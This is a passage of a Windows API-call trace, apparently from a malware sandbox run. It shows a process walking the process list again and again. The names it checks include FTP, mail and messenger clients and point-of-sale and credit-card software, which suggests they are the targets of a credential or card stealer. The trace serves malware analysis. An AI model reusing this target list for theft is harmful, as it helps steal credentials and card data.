szExeFile="degree_sing_pretty.exe")) returned 1 [0219.388] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0219.390] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0219.391] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0219.392] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0219.394] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0219.395] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0219.396] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0219.400] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0219.401] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0219.402] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0219.404] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0219.405] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0219.406] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0219.408] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0219.409] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0219.410] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0219.412] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.413] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.414] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.416] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.417] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.419] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.420] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.421] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.423] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.425] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.426] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.428] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.430] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.431] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0219.501] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0219.503] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0219.505] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0219.506] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0219.508] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0219.511] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0219.513] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0219.515] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0219.517] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0219.520] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0219.522] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0219.524] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0219.525] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0219.527] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0219.529] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0219.531] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0219.533] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0219.535] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0219.536] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0219.548] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0219.549] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0219.551] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0219.552] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0219.554] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0219.555] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0219.557] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0219.558] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0219.560] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0219.562] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0219.564] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0219.565] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0219.567] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0219.568] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0219.569] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0219.571] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.572] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.575] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.577] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0219.578] CloseHandle (hObject=0x2278) returned 1 [0219.578] Sleep (dwMilliseconds=0x64) [0219.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0219.711] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.712] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.714] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.716] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.718] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.719] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.720] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.722] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.725] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.727] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.728] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.730] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.732] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.733] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.735] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, 